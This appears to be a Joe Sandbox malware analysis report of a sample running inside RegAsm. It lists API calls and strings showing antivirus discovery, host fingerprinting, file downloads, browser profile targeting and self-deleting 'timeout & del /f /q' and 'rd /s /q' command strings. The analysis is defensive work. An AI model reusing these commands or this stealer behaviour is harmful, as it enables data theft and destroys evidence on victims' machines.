Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & exit, xrefs: 00418389
" & rd /s /q "C:\ProgramData\, xrefs: 00418333
" & exit, xrefs: 004183DA
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

C, xrefs: 004109DF
wA, xrefs: 00410B21
:\, xrefs: 00410A06
QuBi, xrefs: 00410A27

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

- , xrefs: 004113E6
%s\%s, xrefs: 004112D7
?, xrefs: 00411263

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 0041697E
ERROR, xrefs: 00416977
ERROR, xrefs: 00416985
ERROR, xrefs: 00416914
ERROR, xrefs: 0041696D

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040EB71
Stable\, xrefs: 0040ED5B
firefox, xrefs: 0040EE17

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
